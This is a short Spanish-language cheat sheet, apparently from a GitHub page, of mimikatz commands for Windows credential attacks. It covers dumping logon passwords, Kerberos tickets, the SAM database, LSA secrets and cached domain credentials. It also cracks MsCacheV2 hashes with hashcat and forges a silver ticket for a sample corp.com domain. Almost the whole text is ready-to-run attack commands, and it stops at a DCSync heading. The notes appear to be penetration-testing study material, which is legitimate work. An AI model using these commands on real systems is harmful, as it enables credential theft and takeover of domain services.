You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Password dumping (Para todos los usuarios que iniciaron sesión en el equipo local) - Extraer contraseñas del sistema
mimikatz# sekurlsa::logonPasswords /full
Nota: Tener habilitado solamente el privilege::debug
Password en memoria
mimikatz# sekurlsa::tickets
sam dumping
mimikatz# lsadump::sam
Nota: Tener habilitado solamente el privilege::debug y token::elevate
secrets dumping
mimikatz# lsadump::secrets
Nota: Tener habilitado solamente el privilege::debug
cache dumping
mimikatz# lsadump::cache
El valor lo metemos en un archivo con el formato:
$DCC2$10240#USER#VALOR-MsCacheV2
Crackeamos:
hashcat -m 2100 hash-web_svc /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
Crear Silver Ticket (SPN)
kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:<HASH-NTM> /user:<ALGUN-USER-DEL-DOMAIN>
Luego validamos en Windows si esta el Silver ticket:
PS> klist
PS> iwr -UseDefaultCredentials http://web04
Extraer hashes NTLM cuando el usuario tiene DCSync